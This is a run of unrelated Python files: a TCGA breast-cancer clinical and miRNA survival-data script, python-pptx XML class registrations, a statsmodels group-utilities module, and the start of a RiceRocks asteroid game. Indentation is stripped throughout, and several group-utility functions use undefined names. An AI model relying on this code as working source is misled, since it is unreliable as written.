f.readline()
data=[i.split('\t') for i in f]
clinical2=[['','','']]
for i in data:
if clinical2[-1][0]==i[patient_column]:
if re.search('^[0-9]+$',i[alive_column]):
clinical2[-1]=[i[patient_column],int(i[alive_column]),'Alive']
elif re.search('^[0-9]+$',i[death_column]):
clinical2[-1]=[i[patient_column],int(i[death_column]),'Dead']
else:
pass
else:
if re.search('^[0-9]+$',i[alive_column]):
clinical2.append([i[patient_column],int(i[alive_column]),'Alive'])
elif re.search('^[0-9]+$',i[death_column]):
clinical2.append([i[patient_column],int(i[death_column]),'Dead'])
else:
pass
##removing the empty value
clinical2=clinical2[1:]
##merging the data
new_clinical=[]
for i in clinical2:
if i[0] not in [j[0] for j in clinical1]:
new_clinical.append(i)
else:
if i[1]<=clinical1[[j[0] for j in clinical1].index(i[0])][1]:
new_clinical.append(clinical1[[j[0] for j in clinical1].index(i[0])])
else:
new_clinical.append(i)
for i in clinical1:
if i[0] not in [j[0] for j in new_clinical]:
new_clinical.append(i)
f=open(os.path.join(BASE_DIR,'tcga_data','BRCA','clinical','nationwidechildrens.org_clinical_follow_up_v1.5_brca.txt'))
##get the column indexes needed
columns=f.readline().split('\t')
patient_column=columns.index('bcr_patient_barcode')
alive_column=columns.index('last_contact_days_to')
death_column=columns.index('death_days_to')
f.readline()
f.readline()
data=[i.split('\t') for i in f]
clinical3=[['','','']]
for i in data:
if clinical3[-1][0]==i[patient_column]:
if re.search('^[0-9]+$',i[alive_column]):
clinical3[-1]=[i[patient_column],int(i[alive_column]),'Alive']
elif re.search('^[0-9]+$',i[death_column]):
clinical3[-1]=[i[patient_column],int(i[death_column]),'Dead']
else:
pass
else:
if re.search('^[0-9]+$',i[alive_column]):
clinical3.append([i[patient_column],int(i[alive_column]),'Alive'])
elif re.search('^[0-9]+$',i[death_column]):
clinical3.append([i[patient_column],int(i[death_column]),'Dead'])
else:
pass
##removing the empty value
clinical3=clinical3[1:]
##merging the data
newer_clinical=[]
for i in clinical3:
if i[0] not in [j[0] for j in new_clinical]:
newer_clinical.append(i)
else:
if i[1]<=new_clinical[[j[0] for j in new_clinical].index(i[0])][1]:
newer_clinical.append(new_clinical[[j[0] for j in new_clinical].index(i[0])])
else:
newer_clinical.append(i)
for i in new_clinical:
if i[0] not in [j[0] for j in newer_clinical]:
newer_clinical.append(i)
## Grade, sex, and age information were taken from the "clinical_patient" file. A dictionary was created for sex and grade.
more_clinical={}
grade_dict={}
grade_dict['Infiltrating Ductal Carcinoma']=1
grade_dict['Metaplastic Carcinoma']=3
grade_dict['Mucinous Carcinoma']=4
grade_dict['Medullary Carcinoma']=5
grade_dict['Infiltrating Lobular Carcinoma']=6
sex_dict={}
sex_dict['MALE']=0
sex_dict['FEMALE']=1
## The "clinical_patient" file can also contain patients not listed in the follow_up files.
## In these cases the clinical data for these patients gets appended to a new clinical list.
f=open(os.path.join(BASE_DIR,'tcga_data','BRCA','clinical','nationwidechildrens.org_clinical_patient_brca.txt'))
columns=f.readline().split('\t')
grade_column=columns.index('histological_type')
sex_column=columns.index('gender')
age_column=columns.index('age_at_diagnosis')
patient_column=columns.index('bcr_patient_barcode')
alive_column=columns.index('last_contact_days_to')
death_column=columns.index('death_days_to')
f.readline()
f.readline()
data=[i.split('\t') for i in f]
clinical4=[]
for i in data:
try:
more_clinical[i[patient_column]]=[grade_dict[i[grade_column]],sex_dict[i[sex_column]],int(i[age_column])]
if re.search('^[0-9]+$',i[alive_column]):
clinical4.append([i[patient_column],int(i[alive_column]),'Alive'])
elif re.search('^[0-9]+$',i[death_column]):
clinical4.append([i[patient_column],int(i[death_column]),'Dead'])
else:
pass
except:
pass
newest_clinical=[]
##It is possible that the clinical data in the clinical_patient file is more up to date than the follow_up files
##All the clinical data is merged checking which data is the most up to date
for i in clinical4:
if i[0] not in [j[0] for j in newer_clinical]:
newest_clinical.append(i)
else:
if i[1]<=newer_clinical[[j[0] for j in newer_clinical].index(i[0])][1]:
newest_clinical.append(newer_clinical[[j[0] for j in newer_clinical].index(i[0])])
else:
newest_clinical.append(i)
##also do the reverse since clinical can contain patients not included in clinical4
for i in newer_clinical:
if i[0] not in [j[0] for j in newest_clinical]:
newest_clinical.append(i)
## only patients who had a follow up time greater than 0 days are included in the analysis
clinical=[i for i in newest_clinical if i[1]>0]
final_clinical=[]
## A new list containing both follow up times and grade, sex, and age is constructed.
## Only patients with grade, sex, and age information are included.
## Data is [[Patient ID, time (days), vital status, grade, sex, age at diagnosis],...]
for i in clinical:
if i[0] in more_clinical:
final_clinical.append(i+more_clinical[i[0]])
## Need to map the miRNA files to the correct patients
## The necessary information is included in the FILE_SAMPLE_MAP.txt file
f=open(os.path.join(BASE_DIR,'tcga_data','BRCA','FILE_SAMPLE_MAP_mirna.txt'))
f.readline()
data=[i.strip().split() for i in f if i!='\n']
#### 01 indicates a primary tumor, and only primary tumors are included in this analysis
TCGA_to_mirna={}
for i in data:
##normalized files were used
if 'isoform.quantification' in i[0]:
if i[1].split('-')[3][:-1]=='01':
x=''.join([k+j for k,j in zip(['','-','-'],i[1].split('-')[:3])])
TCGA_to_mirna[x]=TCGA_to_mirna.get(x,[])+[i[0]]
clinical_and_files=[]
## I only care about patients that contained complete clinical information
for i in final_clinical:
if TCGA_to_mirna.has_key(i[0]):
## The miRNA files are added to the clinical list
## Data structure: [[Patient ID, time (days), vital status, grade, sex, age at diagnosis,[miRNA files]],...]
clinical_and_files.append(i+[TCGA_to_mirna[i[0]]])
else:
pass
##print average age at diagnosis
age=np.mean([i[5] for i in clinical_and_files])
##print number of males
males=len([i for i in clinical_and_files if i[4]==0])
##print number of females
females=len([i for i in clinical_and_files if i[4]==1])
##to get the median survival we need to call survfit from r
##prepare variables for R
ro.globalenv['times']=ro.IntVector([i[1] for i in clinical_and_files])
##need to create a dummy variable group
ro.globalenv['group']=ro.IntVector([0 for i in clinical_and_files])
##need a vector for deaths
death_dic={}
death_dic['Alive']=0
death_dic['Dead']=1
ro.globalenv['died']=ro.IntVector([death_dic[i[2]] for i in clinical_and_files])
res=ro.r('survfit(Surv(times,died) ~ as.factor(group))')
#the number of events(deaths) is the fourth column of the output
deaths=str(res).split('\n')[-2].strip().split()[3]
#the median survival time is the fifth column of the output
median=str(res).split('\n')[-2].strip().split()[4]
##write data to a file
f=open('patient_info.txt','w')
f.write('Average Age')
f.write('\t')
f.write('Males')
f.write('\t')
f.write('Females')
f.write('\t')
f.write('Deaths')
f.write('\t')
f.write('Median Survival')
f.write('\n')
f.write(str(age))
f.write('\t')
f.write(str(males))
f.write('\t')
f.write(str(females))
f.write('\t')
f.write(deaths)
f.write('\t')
f.write(median)
f.close()
|
|
# encoding: utf-8
"""
Initializes lxml parser and makes available a handful of functions that wrap
its typical uses.
"""
from __future__ import absolute_import
from lxml import etree
from .ns import NamespacePrefixedTag
# configure etree XML parser -------------------------------
element_class_lookup = etree.ElementNamespaceClassLookup()
oxml_parser = etree.XMLParser(remove_blank_text=True)
oxml_parser.set_element_class_lookup(element_class_lookup)
def parse_xml(xml):
"""
Return root lxml element obtained by parsing XML character string in
*xml*, which can be either a Python 2.x string or unicode.
"""
root_element = etree.fromstring(xml, oxml_parser)
return root_element
def register_element_cls(nsptagname, cls):
"""
Register *cls* to be constructed when the oxml parser encounters an
element having name *nsptag_name*. *nsptag_name* is a string of the form
``nspfx:tagroot``, e.g. ``'w:document'``.
"""
nsptag = NamespacePrefixedTag(nsptagname)
namespace = element_class_lookup.get_namespace(nsptag.nsuri)
namespace[nsptag.local_part] = cls
from .chart.axis import (
CT_AxisUnit, CT_CatAx, CT_LblOffset, CT_Scaling, CT_TickLblPos,
CT_TickMark, CT_ValAx
)
register_element_cls('c:catAx', CT_CatAx)
register_element_cls('c:lblOffset', CT_LblOffset)
register_element_cls('c:majorTickMark', CT_TickMark)
register_element_cls('c:majorUnit', CT_AxisUnit)
register_element_cls('c:minorTickMark', CT_TickMark)
register_element_cls('c:minorUnit', CT_AxisUnit)
register_element_cls('c:scaling', CT_Scaling)
register_element_cls('c:tickLblPos', CT_TickLblPos)
register_element_cls('c:valAx', CT_ValAx)
from .chart.chart import (
CT_Chart, CT_ChartSpace, CT_ExternalData, CT_PlotArea, CT_Style
)
register_element_cls('c:chart', CT_Chart)
register_element_cls('c:chartSpace', CT_ChartSpace)
register_element_cls('c:externalData', CT_ExternalData)
register_element_cls('c:plotArea', CT_PlotArea)
register_element_cls('c:style', CT_Style)
from .chart.legend import CT_Legend, CT_LegendPos
register_element_cls('c:legend', CT_Legend)
register_element_cls('c:legendPos', CT_LegendPos)
from .chart.plot import (
CT_Area3DChart, CT_AreaChart, CT_BarChart, CT_BarDir, CT_DLblPos,
CT_DLbls, CT_GapAmount, CT_Grouping, CT_LineChart, CT_Overlap,
CT_PieChart
)
register_element_cls('c:area3DChart', CT_Area3DChart)
register_element_cls('c:areaChart', CT_AreaChart)
register_element_cls('c:barChart', CT_BarChart)
register_element_cls('c:barDir', CT_BarDir)
register_element_cls('c:dLblPos', CT_DLblPos)
register_element_cls('c:dLbls', CT_DLbls)
register_element_cls('c:gapWidth', CT_GapAmount)
register_element_cls('c:grouping', CT_Grouping)
register_element_cls('c:lineChart', CT_LineChart)
register_element_cls('c:overlap', CT_Overlap)
register_element_cls('c:pieChart', CT_PieChart)
from .chart.series import CT_SeriesComposite, CT_StrVal_NumVal_Composite
register_element_cls('c:pt', CT_StrVal_NumVal_Composite)
register_element_cls('c:ser', CT_SeriesComposite)
from .chart.shared import (
CT_Boolean, CT_Double, CT_Layout, CT_LayoutMode, CT_ManualLayout,
CT_NumFmt, CT_UnsignedInt
)
register_element_cls('c:autoUpdate', CT_Boolean)
register_element_cls('c:delete', CT_Boolean)
register_element_cls('c:idx', CT_UnsignedInt)
register_element_cls('c:invertIfNegative', CT_Boolean)
register_element_cls('c:layout', CT_Layout)
register_element_cls('c:manualLayout', CT_ManualLayout)
register_element_cls('c:max', CT_Double)
register_element_cls('c:min', CT_Double)
register_element_cls('c:numFmt', CT_NumFmt)
register_element_cls('c:order', CT_UnsignedInt)
register_element_cls('c:overlay', CT_Boolean)
register_element_cls('c:smooth', CT_Boolean)
register_element_cls('c:varyColors', CT_Boolean)
register_element_cls('c:x', CT_Double)
register_element_cls('c:xMode', CT_LayoutMode)
from .dml.color import (
CT_HslColor, CT_Percentage, CT_PresetColor, CT_SchemeColor,
CT_ScRgbColor, CT_SRgbColor, CT_SystemColor
)
register_element_cls('a:hslClr', CT_HslColor)
register_element_cls('a:lumMod', CT_Percentage)
register_element_cls('a:lumOff', CT_Percentage)
register_element_cls('a:prstClr', CT_PresetColor)
register_element_cls('a:schemeClr', CT_SchemeColor)
register_element_cls('a:scrgbClr', CT_ScRgbColor)
register_element_cls('a:srgbClr', CT_SRgbColor)
register_element_cls('a:sysClr', CT_SystemColor)
from .dml.fill import (
CT_Blip, CT_BlipFillProperties, CT_GradientFillProperties,
CT_GroupFillProperties, CT_NoFillProperties, CT_PatternFillProperties,
CT_RelativeRect, CT_SolidColorFillProperties
)
register_element_cls('a:blip', CT_Blip)
register_element_cls('a:blipFill', CT_BlipFillProperties)
register_element_cls('a:gradFill', CT_GradientFillProperties)
register_element_cls('a:grpFill', CT_GroupFillProperties)
register_element_cls('a:noFill', CT_NoFillProperties)
register_element_cls('a:pattFill', CT_PatternFillProperties)
register_element_cls('a:solidFill', CT_SolidColorFillProperties)
register_element_cls('a:srcRect', CT_RelativeRect)
from .parts.coreprops import CT_CoreProperties
register_element_cls('cp:coreProperties', CT_CoreProperties)
from .parts.presentation import (
CT_Presentation, CT_SlideId, CT_SlideIdList, CT_SlideMasterIdList,
CT_SlideMasterIdListEntry, CT_SlideSize
)
register_element_cls('p:presentation', CT_Presentation)
register_element_cls('p:sldId', CT_SlideId)
register_element_cls('p:sldIdLst', CT_SlideIdList)
register_element_cls('p:sldMasterId', CT_SlideMasterIdListEntry)
register_element_cls('p:sldMasterIdLst', CT_SlideMasterIdList)
register_element_cls('p:sldSz', CT_SlideSize)
from .parts.slide import CT_CommonSlideData, CT_Slide
register_element_cls('p:cSld', CT_CommonSlideData)
register_element_cls('p:sld', CT_Slide)
from .parts.slidelayout import CT_SlideLayout
register_element_cls('p:sldLayout', CT_SlideLayout)
from .parts.slidemaster import (
CT_SlideLayoutIdList, CT_SlideLayoutIdListEntry, CT_SlideMaster
)
register_element_cls('p:sldLayoutId', CT_SlideLayoutIdListEntry)
register_element_cls('p:sldLayoutIdLst', CT_SlideLayoutIdList)
register_element_cls('p:sldMaster', CT_SlideMaster)
from .shapes.autoshape import (
CT_GeomGuide, CT_GeomGuideList, CT_NonVisualDrawingShapeProps,
CT_PresetGeometry2D, CT_Shape, CT_ShapeNonVisual
)
register_element_cls('a:avLst', CT_GeomGuideList)
register_element_cls('a:gd', CT_GeomGuide)
register_element_cls('a:prstGeom', CT_PresetGeometry2D)
register_element_cls('p:cNvSpPr', CT_NonVisualDrawingShapeProps)
register_element_cls('p:nvSpPr', CT_ShapeNonVisual)
register_element_cls('p:sp', CT_Shape)
from .shapes.connector import CT_Connector, CT_ConnectorNonVisual
register_element_cls('p:cxnSp', CT_Connector)
register_element_cls('p:nvCxnSpPr', CT_ConnectorNonVisual)
from .shapes.graphfrm import (
CT_GraphicalObject, CT_GraphicalObjectData, CT_GraphicalObjectFrame,
CT_GraphicalObjectFrameNonVisual
)
register_element_cls('a:graphic', CT_GraphicalObject)
register_element_cls('a:graphicData', CT_GraphicalObjectData)
register_element_cls('p:graphicFrame', CT_GraphicalObjectFrame)
register_element_cls('p:nvGraphicFramePr', CT_GraphicalObjectFrameNonVisual)
from .shapes.groupshape import (
CT_GroupShape, CT_GroupShapeNonVisual, CT_GroupShapeProperties
)
register_element_cls('p:grpSp', CT_GroupShape)
register_element_cls('p:grpSpPr', CT_GroupShapeProperties)
register_element_cls('p:nvGrpSpPr', CT_GroupShapeNonVisual)
register_element_cls('p:spTree', CT_GroupShape)
from .shapes.picture import CT_Picture, CT_PictureNonVisual
register_element_cls('p:blipFill', CT_BlipFillProperties)
register_element_cls('p:nvPicPr', CT_PictureNonVisual)
register_element_cls('p:pic', CT_Picture)
from .shapes.shared import (
CT_ApplicationNonVisualDrawingProps, CT_LineProperties,
CT_NonVisualDrawingProps, CT_Placeholder, CT_Point2D, CT_PositiveSize2D,
CT_ShapeProperties, CT_Transform2D
)
register_element_cls('a:ext', CT_PositiveSize2D)
register_element_cls('a:ln', CT_LineProperties)
register_element_cls('a:off', CT_Point2D)
register_element_cls('a:xfrm', CT_Transform2D)
register_element_cls('c:spPr', CT_ShapeProperties)
register_element_cls('p:cNvPr', CT_NonVisualDrawingProps)
register_element_cls('p:nvPr', CT_ApplicationNonVisualDrawingProps)
register_element_cls('p:ph', CT_Placeholder)
register_element_cls('p:spPr', CT_ShapeProperties)
register_element_cls('p:xfrm', CT_Transform2D)
from .shapes.table import (
CT_Table, CT_TableCell, CT_TableCellProperties, CT_TableCol,
CT_TableGrid, CT_TableProperties, CT_TableRow
)
register_element_cls('a:gridCol', CT_TableCol)
register_element_cls('a:tbl', CT_Table)
register_element_cls('a:tblGrid', CT_TableGrid)
register_element_cls('a:tblPr', CT_TableProperties)
register_element_cls('a:tc', CT_TableCell)
register_element_cls('a:tcPr', CT_TableCellProperties)
register_element_cls('a:tr', CT_TableRow)
from .text import (
CT_Hyperlink, CT_RegularTextRun, CT_TextBody, CT_TextBodyProperties,
CT_TextCharacterProperties, CT_TextField, CT_TextFont, CT_TextLineBreak,
CT_TextNormalAutofit, CT_TextParagraph, CT_TextParagraphProperties,
CT_TextSpacing, CT_TextSpacingPercent, CT_TextSpacingPoint
)
register_element_cls('a:bodyPr', CT_TextBodyProperties)
register_element_cls('a:br', CT_TextLineBreak)
register_element_cls('a:defRPr', CT_TextCharacterProperties)
register_element_cls('a:endParaRPr', CT_TextCharacterProperties)
register_element_cls('a:fld', CT_TextField)
register_element_cls('a:hlinkClick', CT_Hyperlink)
register_element_cls('a:latin', CT_TextFont)
register_element_cls('a:lnSpc', CT_TextSpacing)
register_element_cls('a:normAutofit', CT_TextNormalAutofit)
register_element_cls('a:r', CT_RegularTextRun)
register_element_cls('a:p', CT_TextParagraph)
register_element_cls('a:pPr', CT_TextParagraphProperties)
register_element_cls('a:rPr', CT_TextCharacterProperties)
register_element_cls('a:spcAft', CT_TextSpacing)
register_element_cls('a:spcBef', CT_TextSpacing)
register_element_cls('a:spcPct', CT_TextSpacingPercent)
register_element_cls('a:spcPts', CT_TextSpacingPoint)
register_element_cls('a:txBody', CT_TextBody)
register_element_cls('c:txPr', CT_TextBody)
register_element_cls('p:txBody', CT_TextBody)
|
|
# -*- coding: utf-8 -*-
"""Tools for working with groups
This provides several functions to work with groups and a Group class that
keeps track of the different representations and has methods to work more
easily with groups.
Author: Josef Perktold,
Author: Nathaniel Smith, recipe for sparse_dummies on scipy user mailing list
Created on Tue Nov 29 15:44:53 2011 : sparse_dummies
Created on Wed Nov 30 14:28:24 2011 : combine_indices
changes: add Group class
Notes
~~~~~
This reverses the class I used before, where the class was for the data and
the group was auxiliary. Here, it is only the group, no data is kept.
sparse_dummies needs checking for corner cases, e.g.
what if a category level has zero elements? This can happen with subset
selection even if the original groups where defined as arange.
Not all methods and options have been tried out yet after refactoring
need more efficient loop if groups are sorted -> see GroupSorted.group_iter
"""
import numpy as np
from statsmodels.compatnp.np_compat import npc_unique
def combine_indices(groups, prefix='', sep='.', return_labels=False):
'''use np.unique to get integer group indices for product, intersection
'''
if isinstance(groups, tuple):
groups = np.column_stack(groups)
else:
groups = np.asarray(groups)
dt = groups.dtype
#print dt
is2d = (groups.ndim == 2) #need to store
if is2d:
ncols = groups.shape[1]
if not groups.flags.c_contiguous:
groups = np.array(groups, order='C')
groups_ = groups.view([('',groups.dtype)]*groups.shape[1])
else:
groups_ = groups
uni, uni_idx, uni_inv = npc_unique(groups_, return_index=True,
return_inverse=True)
if is2d:
uni = uni.view(dt).reshape(-1, ncols)
#avoiding a view would be
# for t in uni.dtype.fields.values():
# assert (t[0] == dt)
#
# uni.dtype = dt
# uni.shape = (uni.size//ncols, ncols)
if return_labels:
label = [(prefix+sep.join(['%s']*len(uni[0]))) % tuple(ii)
for ii in uni]
return uni_inv, uni_idx, uni, label
else:
return uni_inv, uni_idx, uni
#written for and used in try_covariance_grouploop.py
def group_sums(x, group, use_bincount=True):
'''simple bincount version, again
group : array, integer
assumed to be consecutive integers
no dtype checking because I want to raise in that case
uses loop over columns of x
for comparison, simple python loop
'''
x = np.asarray(x)
if x.ndim == 1:
x = x[:,None]
elif x.ndim > 2 and use_bincount:
raise ValueError('not implemented yet')
if use_bincount:
return np.array([np.bincount(group, weights=x[:,col])
for col in range(x.shape[1])])
else:
uniques = np.unique(group)
result = np.zeros([len(uniques)] + list(x.shape[1:]))
for ii, cat in enumerate(uniques):
result[ii] = x[g==cat].sum(0)
return result
def group_sums_dummy(x, group_dummy):
'''sum by groups given group dummy variable
group_dummy can be either ndarray or sparse matrix
'''
if type(group_dummy) is np.ndarray:
return np.dot(x.T, group_dummy)
else: #check for sparse
return x.T * group_dummy
def dummy_sparse(groups):
'''create a sparse indicator from a group array with integer labels
Parameters
----------
groups: ndarray, int, 1d (nobs,)
an array of group indicators for each observation. Group levels are assumed
to be defined as consecutive integers, i.e. range(n_groups) where
n_groups is the number of group levels. A group level with no
observations for it will still produce a column of zeros.
Returns
-------
indi : ndarray, int8, 2d (nobs, n_groups)
an indicator array with one row per observation, that has 1 in the
column of the group level for that observation
Examples
--------
>>> g = np.array([0, 0, 2, 1, 1, 2, 0])
>>> indi = dummy_sparse(g)
>>> indi
<7x3 sparse matrix of type '<type 'numpy.int8'>'
with 7 stored elements in Compressed Sparse Row format>
>>> indi.todense()
matrix([[1, 0, 0],
[1, 0, 0],
[0, 0, 1],
[0, 1, 0],
[0, 1, 0],
[0, 0, 1],
[1, 0, 0]], dtype=int8)
current behavior with missing groups
>>> g = np.array([0, 0, 2, 0, 2, 0])
>>> indi = dummy_sparse(g)
>>> indi.todense()
matrix([[1, 0, 0],
[1, 0, 0],
[0, 0, 1],
[1, 0, 0],
[0, 0, 1],
[1, 0, 0]], dtype=int8)
'''
from scipy import sparse
indptr = np.arange(len(groups)+1)
data = np.ones(len(groups), dtype=np.int8)
indi = sparse.csr_matrix((data, g, indptr))
return indi
class Group(object):
def __init__(self, group, name=''):
#self.group = np.asarray(group) #TODO: use checks in combine_indices
self.name = name
uni, uni_idx, uni_inv = combine_indices(group)
#TODO: rename these to something easier to remember
self.group_int, self.uni_idx, self.uni = uni, uni_idx, uni_inv
self.n_groups = len(self.uni)
#put this here so they can be overwritten before calling labels
self.separator = '.'
self.prefix = self.name
if self.prefix:
self.prefix = self.prefix + '='
#cache decorator
def counts(self):
return np.bincount(self.group_int)
#cache_decorator
def labels(self):
#is this only needed for product of groups (intersection)?
prefix = self.prefix
uni = self.uni
sep = self.separator
if uni.ndim > 1:
label = [(prefix+sep.join(['%s']*len(uni[0]))) % tuple(ii)
for ii in uni]
else:
label = [prefix + '%s' % ii for ii in uni]
return label
def dummy(self, drop_idx=None, sparse=False, dtype=int):
'''
drop_idx is only available if sparse=False
drop_idx is supposed to index into uni
'''
uni = self.uni
if drop_idx is not None:
idx = range(len(uni))
del idx[drop_idx]
uni = uni[idx]
group = self.group
if not sparse:
return (group[:,None] == uni[None,:]).astype(dtype)
else:
return dummy_sparse(self.group_int)
def interaction(self, other):
if isinstance(other, self.__class__):
other = other.group
return self.__class__((self, other))
def group_sums(self, x, use_bincount=True):
return group_sums(x, self.group_int, use_bincount=use_bincount)
def group_demean(self, x, use_bincount=True):
means_g = group_demean(x/float(nobs), self.group_int,
use_bincount=use_bincount)
x_demeaned = x - means_g[self.group_int] #check reverse_index?
return x_demeaned, means_g
class GroupSorted(Group):
def __init__(self, group, name=''):
super(self.__class__, self).__init__(group, name=name)
idx = (np.nonzero(np.diff(group))[0]+1).tolist()
self.groupidx = groupidx = zip([0]+idx, idx+[len(group)])
ngroups = len(groupidx)
def group_iter(self):
for low, upp in self.groupidx:
yield slice(low, upp)
def lag_indices(self, lag):
'''return the index array for lagged values
Warning: if k is larger then the number of observations for an
individual, then no values for that individual are returned.
TODO: for the unbalanced case, I should get the same truncation for
the array with lag=0. From the return of lag_idx we wouldn't know
which individual is missing.
TODO: do I want the full equivalent of lagmat in tsa?
maxlag or lag or lags.
not tested yet
'''
lag_idx = np.asarray(self.groupidx)[:,1] - lag #asarray or already?
mask_ok = (low <= lag_idx)
#still an observation that belongs to the same individual
return lag_idx[mask_ok]
if __name__ == '__main__':
#---------- examples combine_indices
from numpy.testing import assert_equal
np.random.seed(985367)
groups = np.random.randint(0,2,size=(10,2))
uv, ux, u, label = combine_indices(groups, return_labels=True)
uv, ux, u, label = combine_indices(groups, prefix='g1,g2=', sep=',',
return_labels=True)
group0 = np.array(['sector0', 'sector1'])[groups[:,0]]
group1 = np.array(['region0', 'region1'])[groups[:,1]]
uv, ux, u, label = combine_indices((group0, group1),
prefix='sector,region=',
sep=',',
return_labels=True)
uv, ux, u, label = combine_indices((group0, group1), prefix='', sep='.',
return_labels=True)
group_joint = np.array(label)[uv]
group_joint_expected = np.array(
['sector1.region0', 'sector0.region1', 'sector0.region0',
'sector0.region1', 'sector1.region1', 'sector0.region0',
'sector1.region0', 'sector1.region0', 'sector0.region1',
'sector0.region0'],
dtype='|S15')
assert_equal(group_joint, group_joint_expected)
'''
>>> uv
array([2, 1, 0, 0, 1, 0, 2, 0, 1, 0])
>>> label
['sector0.region0', 'sector1.region0', 'sector1.region1']
>>> np.array(label)[uv]
array(['sector1.region1', 'sector1.region0', 'sector0.region0',
'sector0.region0', 'sector1.region0', 'sector0.region0',
'sector1.region1', 'sector0.region0', 'sector1.region0',
'sector0.region0'],
dtype='|S15')
>>> np.column_stack((group0, group1))
array([['sector1', 'region1'],
['sector1', 'region0'],
['sector0', 'region0'],
['sector0', 'region0'],
['sector1', 'region0'],
['sector0', 'region0'],
['sector1', 'region1'],
['sector0', 'region0'],
['sector1', 'region0'],
['sector0', 'region0']],
dtype='|S7')
'''
#------------- examples sparse_dummies
from scipy import sparse
g = np.array([0, 0, 1, 2, 1, 1, 2, 0])
u = range(3)
indptr = np.arange(len(g)+1)
data = np.ones(len(g), dtype=np.int8)
a = sparse.csr_matrix((data, g, indptr))
print a.todense()
print np.all(a.todense() == (g[:,None] == np.arange(3)).astype(int))
x = np.arange(len(g)*3).reshape(len(g), 3, order='F')
print 'group means'
print x.T * a
print np.dot(x.T, g[:,None] == np.arange(3))
print np.array([np.bincount(g, weights=x[:,col]) for col in range(3)])
for cat in u:
print x[g==cat].sum(0)
for cat in u: x[g==cat].sum(0)
cc = sparse.csr_matrix([[0, 1, 0, 1, 0, 0, 0, 0, 0],
[1, 0, 1, 0, 1, 0, 0, 0, 0],
[0, 1, 0, 0, 0, 1, 0, 0, 0],
[1, 0, 0, 0, 1, 0, 1, 0, 0],
[0, 1, 0, 1, 0, 1, 0, 1, 0],
[0, 0, 1, 0, 1, 0, 0, 0, 1],
[0, 0, 0, 1, 0, 0, 0, 1, 0],
[0, 0, 0, 0, 1, 0, 1, 0, 1],
[0, 0, 0, 0, 0, 1, 0, 1, 0]])
#------------- groupsums
print group_sums(np.arange(len(g)*3*2).reshape(len(g),3,2), g,
use_bincount=False).T
print group_sums(np.arange(len(g)*3*2).reshape(len(g),3,2)[:,:,0], g)
print group_sums(np.arange(len(g)*3*2).reshape(len(g),3,2)[:,:,1], g)
#------------- examples class
x = np.arange(len(g)*3).reshape(len(g), 3, order='F')
mygroup = Group(g)
print mygroup.group_int
print mygroup.group_sums(x)
print mygroup.labels()
|
|
# implementation of Spaceship - program template for RiceRocks
import simplegui
import math
import random
# globals for user interface
WIDTH = 800
HEIGHT = 600
score = 0
lives = 3
time = 0
started = False
class ImageInfo:
def __init__(self, center, size, radius = 0, lifespan = None, animated = False):
self.center = center
self.size = size
self.radius = radius
if lifespan:
self.lifespan = lifespan
else:
self.lifespan = float('inf')
self.animated = animated
def get_center(self):
return self.center
def get_size(self):
return self.size
def get_radius(self):
return self.radius
def get_lifespan(self):
return self.lifespan
def get_animated(self):
return self.animated
# art assets created by Kim Lathrop, may be freely re-used in non-commercial projects, please credit Kim
# debris images - debris1_brown.png, debris2_brown.png, debris3_brown.png, debris4_brown.png
# debris1_blue.png, debris2_blue.png, debris3_blue.png, debris4_blue.png, debris_blend.png
debris_info = ImageInfo([320, 240], [640, 480])
debris_image = simplegui.load_image("http://commondatastorage.googleapis.com/codeskulptor-assets/lathrop/debris2_blue.png")
# nebula images - nebula_brown.png, nebula_blue.png
nebula_info = ImageInfo([400, 300], [800, 600])
nebula_image = simplegui.load_image("http://commondatastorage.googleapis.com/codeskulptor-assets/lathrop/nebula_blue.f2013.png")
# splash image
splash_info = ImageInfo([200, 150], [400, 300])
splash_image = simplegui.load_image("http://commondatastorage.googleapis.com/codeskulptor-assets/lathrop/splash.png")
# ship image
ship_info = ImageInfo([45, 45], [90, 90], 35)
ship_image = simplegui.load_image("http://commondatastorage.googleapis.com/codeskulptor-assets/lathrop/double_ship.png")
# missile image - shot1.png, shot2.png, shot3.png
missile_info = ImageInfo([5,5], [10, 10], 3, 50)
missile_image = simplegui.load_image("http://commondatastorage.googleapis.com/codeskulptor-assets/lathrop/shot2.png")
# asteroid images - asteroid_blue.png, asteroid_brown.png, asteroid_blend.png
asteroid_info = ImageInfo([45, 45], [90, 90], 40)
asteroid_image = simplegui.load_image("http://commondatastorage.googleapis.com/codeskulptor-assets/lathrop/asteroid_blue.png")
# animated explosion - explosion_orange.png, explosion_blue.png, explosion_blue2.png, explosion_alpha.png
explosion_info = ImageInfo([64, 64], [128, 128], 17, 24, True)
explosion_image = simplegui.load_image("http://commondatastorage.googleapis.com/codeskulptor-assets/lathrop/explosion_alpha.png")
# sound assets purchased from sounddogs.com, please do not redistribute
# .ogg versions of sounds are also available, just replace .mp3 by .ogg
soundtrack = simplegui.load_sound("http://commondatastorage.googleapis.com/codeskulptor-assets/sounddogs/soundtrack.mp3")
missile_sound = simplegui.load_sound("http://commondatastorage.googleapis.com/codeskulptor-assets/sounddogs/missile.mp3")
missile_sound.set_volume(.5)
ship_thrust_sound = simplegui.load_sound("http://commondatastorage.googleapis.com/codeskulptor-assets/sounddogs/thrust.mp3")
explosion_sound = simplegui.load_sound("http://commondatastorage.googleapis.com/codeskulptor-assets/sounddogs/explosion.mp3")
# helper functions to handle transformations
def angle_to_vector(ang):
return [math.cos(ang), math.sin(ang)]
def dist(p, q):
return math.sqrt((p[0] - q[0]) ** 2 + (p[1] - q[1]) ** 2)
# Ship class
class Ship:
def __init__(self, pos, vel, angle, image, info):
self.pos = [pos[0], pos[1]]
self.vel = [vel[0], vel[1]]
self.thrust = False
self.angle = angle
self.angle_vel = 0
self.image = image
self.image_center = info.get_center()
self.image_size = info.get_size()
self.radius = info.get_radius()
def draw(self,canvas):
if self.thrust:
canvas.draw_image(self.image, [self.image_center[0] + self.image_size[0], self.image_center[1]] , self.image_size,
self.pos, self.image_size, self.angle)
else:
canvas.draw_image(self.image, self.image_center, self.image_size,
self.pos, self.image_size, self.angle)
# canvas.draw_circle(self.pos, self.radius, 1, "White", "White")
def update(self):
# update angle
self.angle += self.angle_vel
# update position
self.pos[0] = (self.pos[0] + self.vel[0]) % WIDTH
self.pos[1] = (self.pos[1] + self.vel[1]) % HEIGHT
# update velocity
if self.thrust:
acc = angle_to_vector(self.angle)
self.vel[0] += acc[0] * .1
self.vel[1] += acc[1] * .1
self.vel[0] *= .99
self.vel[1] *= .99
def set_thrust(self, on):
self.thrust = on
if on:
ship_thrust_sound.rewind()
ship_thrust_sound.play()
else:
ship_thrust_sound.pause()
